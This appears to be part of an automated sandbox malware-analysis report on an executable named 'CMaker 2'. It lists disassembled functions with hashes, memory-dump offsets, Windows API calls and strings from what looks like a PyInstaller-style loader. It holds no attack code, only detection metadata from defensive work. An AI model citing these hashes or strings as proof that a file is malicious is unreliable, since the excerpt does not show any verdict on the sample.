• Opcode Fuzzy Hash: c0bd77ba3b70669da09b487a0ea8a9d1258efaa5b8366dc8ff5dd73dfcf56369
• Instruction Fuzzy Hash: BF81E576A0C7818AE774CB59944037D7A91FB86794F98427DDAAD83BD9EF3DE4008B00
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: dafa21fd323fba1ffdb82202de70c6ebe6d7ee83da844ca0b8fe7320dd75a47a
• Instruction ID: 58e0b52633aa0b05796ff3c8142fb9038377aae6fc3ba7cfb9bc91ff3ffd6fbf
• Opcode Fuzzy Hash: dafa21fd323fba1ffdb82202de70c6ebe6d7ee83da844ca0b8fe7320dd75a47a
• Instruction Fuzzy Hash: 2B610DB6F1C24286FB648E2C845427D66A2AF41770F1496B9D7BDC26D5FEFDE8008700
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: a06c40d529e681c61668b9c674887fe0dd76156fbde95dd23102874644b77d2c
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: 6551B63AA18A5186E7648B69C04023C33A0FB4AB58F684179CE5D977E5FF3AE943C750
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction ID: d6a156add11b534346477a7d228d4ab7531c9d5105fccb990107e3b4929d9b24
• Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction Fuzzy Hash: C751C736A19A5186E7248B39C08423833A0EB46F69FA441B1DE5D977D5EF3AFC43C790
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: 2fa4a86de8f34c776efe0c5f8b13aa78b07f2abfc2517985ec9fe367a97ce214
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: 6A51D93AA1865182E7248B69C44023873A0EB86F58F685179CE6C877F5FF3AEC43C740
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: the same six dumps (00007FF6FABE0000, 00007FF6FAC0B000, 00007FF6FAC1E000, 00007FF6FAC24000, 00007FF6FAC26000, 00007FF6FAC2D000) listed for the preceding function
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                  • Opcode ID: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                  • Instruction ID: dce74b6ce5819e4cefdf5d0316a24c0d456e68e791763b7da169fc2c331006bb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b300af1d1946d5df55db44b3d4e0876ae34829a82d49cb6751e26c04e9c1898
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D51A376A18A5586E7248F39C08423837A0EB46B59FB481F1CE5D877E4EF3AE853C750
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                  • Instruction ID: 5fd6b73f9fa2675b95e3cdab6af20f6f88628e8e4c3de4e1c1f175a38b9795e4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7710b6301a9c53c0f35ccf6fc131232db227f89fb6367f1206a3fe51f4b04988
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4251A17AA1865186E7248B69C04023D37B0EB4AB58FAC5179CE5C977F4FF3AE852C740
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                  • Instruction ID: 950ef888572de9b53f217116c839f818936750094f3fc4604f5f84c01a7f1020
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c9c7dfd85d7e05c9dc9b7e40d932aad9843605f203f1a6a08d3cc10701c718b
                                                                                                                                                                                  • Instruction Fuzzy Hash: D451D33AA1865586EB248B68C04023937A0EB46B58F684179DE5D877F4FF3AED43D780
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                  • Instruction ID: e7af746d7580ef54ffe8b96a731619b1a88d3fca2074d6a1c52b8006a6954372
                                                                                                                                                                                  • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9141935A80D64A06EB958D9845106B82688AF23BA0FDC53FCDDBBD33C3ED1D65D7C200
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                  • Opcode ID: 6e7531a28f25f8c3b2f3f11a6ce53f43a5e2fd9c2c8f795175ae5b8f39881432
                                                                                                                                                                                  • Instruction ID: 8434592679439ca453526ed9f29feaab856b82b68cb4e66278845c1943a64791
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e7531a28f25f8c3b2f3f11a6ce53f43a5e2fd9c2c8f795175ae5b8f39881432
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E412476718A5582EF08CF6AD914579B3A1FB49FC0B48A436EE1DD7B98EE3DD0428300
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3bc4cc9b189c3d63146a2f8633e9bae6a6789799e533dea34e92803710407a17
                                                                                                                                                                                  • Instruction ID: 2823712ebc9869445b02e66824cd4e87ca45540f3bcecfb1c2f5d9e154073789
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bc4cc9b189c3d63146a2f8633e9bae6a6789799e533dea34e92803710407a17
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA31077A719B8242EB14DF65A44017E66E4AF85B90F4842BCEA6DD3BD6EF3CD0128704
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1a3e8b8eb2fdd931f1516922c3244619dcb6b035101358effb1656bca6f43a26
                                                                                                                                                                                  • Instruction ID: 8895bfbc36d6bfff1f00e222b1f59417426e8123ce408b7cb8e9329e686c3927
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a3e8b8eb2fdd931f1516922c3244619dcb6b035101358effb1656bca6f43a26
• Instruction Fuzzy Hash: E4F06875B182998EDBA48F2DA40262A77E4F708380F809079E59DC3B44EA7C90608F04
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AddressProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 190572456-573889970
• Opcode ID: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
• Instruction ID: 857f873d96ab79f8aab4f997b8a7b5ae86da6f12a4b5bc5144c537041845d8c6
• Opcode Fuzzy Hash: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
• Instruction Fuzzy Hash: 9AE16EE4A0DB4790FB56CB14B8A02B463B4BF19754B94A0F6C93ED23E5FF3CA5499201
APIs
  • Part of subcall function 00007FF6FABE7800: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FABE31D4,00000000,00007FF6FABE1905), ref: 00007FF6FABE7839
• ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6FABE6EC7,?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE69FC
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 2001182103-930877121
• Opcode ID: 64d99159d200a5e4cd4d4a8101930630fc8e86c1a9a6e01072d2e1df627dda6d
• Instruction ID: 8b25c6b12ee2d5cc3aba61eaff1e1de9e96f50184a8bad144f05e36eec7f1066
• Opcode Fuzzy Hash: 64d99159d200a5e4cd4d4a8101930630fc8e86c1a9a6e01072d2e1df627dda6d
• Instruction Fuzzy Hash: 4641BA61B1C68341FB51DB25E8A12BA6361EF95780FC4A4F5E66EC36D6FE3CE5048700
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: -$:$f$p$p
• API String ID: 3215553584-2013873522
• Opcode ID: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
• Instruction ID: 58299c967cc52368a5bca97e44246e660f45fb03daf624c6653088e5be0ea759
• Opcode Fuzzy Hash: 4cf7e6b867a9921ad7ec7aa07c9b27dd84d4bc01ad74cf8c657fddc9a570da3b
• Instruction Fuzzy Hash: FC12C469E0C2C346FB205B94E1242B9B699FB52750FCC417DDEA9866C4FF3DE9809B10
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
• Instruction ID: 5cd1ede6f597023a0ed36f1a76f0d20770555450b2b4e465ef96749780edff71
• Opcode Fuzzy Hash: 2761c62bb11862c53203c4a1c44b9eb9fed40e0afa0247b40f2c3f0b102f2d4b
• Instruction Fuzzy Hash: 62129632F0D18386FB245A34E0946B976A2FB42755FD841F5D6A9866C4FF3DE890CB20
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 02fa574a2b1b787a352bc7f7ecae9421bbc1ba1fff6180aac722f31c691a4446
• Instruction ID: 97f6ae28e7adeab17516ac88c1200cb8353f964b36fc9da8c4194eafbeccf629
• Opcode Fuzzy Hash: 02fa574a2b1b787a352bc7f7ecae9421bbc1ba1fff6180aac722f31c691a4446
• Instruction Fuzzy Hash: 72419361B0864242EB24DB16B8806BAA7A1FF56BC4FD490B1DD6EC77D6FE3CE0459301
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: ec37be12e2654c44ef8bbb66bf94e32f31c054afd3e906b5c1220b189cb7876c
• Instruction ID: 279696541d8bade015a870367066ae10042586f14fb06624f26be22086e27fbe
• Opcode Fuzzy Hash: ec37be12e2654c44ef8bbb66bf94e32f31c054afd3e906b5c1220b189cb7876c
• Instruction Fuzzy Hash: 07418F61B0864282EB24DB15F4805BA63A0EF567D0FE490B2DE6EC7AD5FE7CE5418700
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2271900873.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000002.00000002.2271866507.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271947691.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2271988169.00007FF6FAC24000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2272058430.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
• Instruction ID: e8b523ac4dc007905ad3982da40c624cfcfc8085b0101e87d1acf2e76bca7ef5
• Opcode Fuzzy Hash: c5270a4f35af077b5cb6a45d2d3941eb25c66998b702b56485634ee7620a4e43
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AD1A332A187428AEB60DF65D4843AD77A0FB46788F9001B5EE5D977DAEF78E081C740
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC17D
                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC18B
                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC1B5
                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC223
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF6FABEC3AA,?,?,?,00007FF6FABEC09C,?,?,?,00007FF6FABEBC99), ref: 00007FF6FABEC22F
                                                                                                                                                                                  Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
